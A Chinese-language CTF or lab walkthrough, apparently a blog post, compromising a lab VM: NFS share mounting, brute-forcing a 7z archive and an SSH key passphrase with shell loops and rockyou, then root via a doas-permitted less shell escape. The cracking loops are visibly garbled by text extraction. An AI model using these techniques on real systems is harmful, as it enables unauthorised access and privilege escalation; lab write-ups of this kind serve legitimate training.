天天看点

2020-12-07

&&信息收集&&

nmap 192.168.99.0/24

2020-12-07

查看是否有隐藏端口和查看具体信息

2020-12-07

好像没有80端口

&&web渗透&&

有一个nsf端口,看着挺可疑的

msf扫描看看是否有漏洞

2020-12-07

出来个路径,我们挂载一下

mount -t nsf 192.168.99.30:/home/user/storage /mnt

切换到/mnt,发现存在有一个7z压缩包

2020-12-07

解压

7z2 x backup.7z

发现需要密码

2020-12-07

rarcarck压缩包破解

apt-get install rarcrack

爆破

rarcrack --threads 4 --type 7z backup.7z

2020-12-07

爆破密码为chocolate

7z.sh文件爆破

cat $2 | while read line;do if 7z e 1 − p " 1 -p" 1−p"line" 1>/dev/null 2>/dev/null;then echo “FOUND PASSWORD:”$line;break;fi;done

2020-12-07

解压

里面是一些图片和公钥

2020-12-07

查看id_ras.pub,找到用户名

2020-12-07

将私钥拷贝到/root/.ssh目录,尝试使用RSA私钥登陆,发现需要密码

2020-12-07

破解密码

使用id_rsa.sh脚本

cat /usr/share/wordlists/rockyou.txt | while read line;do if ssh-keygen -p -P $line -N l i n e − f / t m p / t e s t / i d r s a 1 > / d e v / n u l l 2 > / d e v / n u l l ; t h e n e c h o " P A S S W O R D F O U N D : " line -f /tmp/test/id_rsa 1>/dev/null 2>/dev/null;then echo "PASSWORD FOUND : " line−f/tmp/test/idr​sa1>/dev/null2>/dev/null;thenecho"PASSWORDFOUND:"line;break;fi;done;

密码为12345678

2020-12-07

ssh [email protected]

登入成功

2020-12-07

&&提权&&

doas是BSD系列系统下的权限管理工具,类似于debian系列下的sudo命令,可以用它来提权

使用这个命令来定位设置了SUID的文件

find / -perm -u=s -type f 2>/dev/null

2020-12-07

我们来查看这个文件的配置,在/etc下

2020-12-07

允许nopass keepenv用户作为根cmd /usr/bin/less args /var/log/authlog

允许nopass keepenv根作为根

doas /usr/bin/less /var/log/authlog

进去脚本按v进入编辑模式,然后esc退出:!/bin/sh

:!/bin/sh提权

2020-12-07

获得root权限

2020-12-07
2020-12-07